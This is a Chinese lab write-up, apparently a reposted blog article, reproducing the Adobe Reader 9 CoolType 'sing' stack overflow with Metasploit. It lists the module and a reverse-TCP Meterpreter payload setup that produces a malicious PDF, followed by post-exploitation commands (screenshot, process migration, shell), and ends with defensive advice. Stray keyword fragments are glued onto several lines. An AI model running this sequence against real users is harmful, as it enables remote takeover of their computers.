今天的漏洞复现,选了一个Adobe的一个有关打开pdf就会中招的漏洞。shell
1.原理
Adobe Reader在处理CoolType字体文件的sing表时,存在栈溢出漏洞,当打开特制的恶意PDF文件时,可容许任意代码远程执行。windows
2.影响版本
Adobe Reader 8.2.4 - 9.3.4微信
3.漏洞复现环境
Kali Linux + Windows 7 sp1 渗透机:Kali Linux (ip:192.168.95.140) 靶机:Windows 7 sp1 (ip:192.168.95.139) 软件:Adobe Reader 9.0.exetcp
4.实操
因为kali的metasploit集成了不少漏洞,所以咱们直接在metasploit上查找adobe_cooltype_sing漏洞进行复现1.搜索search adobe_cooltype_sing模块2.调用渗透模块3.查看模板详情
调用meterpreter载荷,反向链接到渗透机 msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp 设置Kali Linux的IP地址 msf exploit(adobe_cooltype_sing) > set LHOST 192.168.95.140设置本地监听端口 msf exploit(adobe_cooltype_sing) > set LPORT 8888 设置带有后门程序的PDF文件 msf exploit(adobe_cooltype_sing) > set FILENAME test.pdf 执行渗透生成文件 msf exploit(adobe_cooltype_sing) > exploit
将含有木马的pdf文件拷贝到桌面
字体
Metasploit开启shell监听会话,等待肉鸡上线ui
在windows7上安装Adobe Reader9.0spa
将PDF木马文件拷贝到Windows 7并打开.net
打开文件后,Metasploit获取shell会话,并用Meterpreter控制肉鸡3d
查看系统信息 meterpreter > sysinfo 查看当前用户 meterpreter > getuid 截屏 meterpreter > screenshot
获取进程 meterpreter > ps 切换进程meterpreter > migrate 1548
获取Dos Shell meterpreter > shell C:\Windows\system32>ipconfig
5.实验总结
能够看到,一旦电脑打开特殊定制的pdf以后,在没有拦截的状况下,直接变成肉鸡。真实环境下,不少黑客会利用此方法,结合社会工程学,例如经过邮件、QQ群、微信群等多渠道,诱导用户下载并打开。所以用户在打开以前必定要明确文件来源,或者用杀毒软件先杀毒,再打开。另外,就是尽可能保证电脑的软件处于最新版,这样才能最大程度下降被攻击的概率。
6.漏洞修复
下载Adobe Reader最新版本。安装常见杀毒软件,开启实时防御和杀毒引擎实时升级。
本文分享自微信公众号 - 渗透吧(shentouba)。
若有侵权,请联系 support@oschina.cn 删除。
本文参与“OSC源创计划”,欢迎正在阅读的你也加入,一块儿分享。code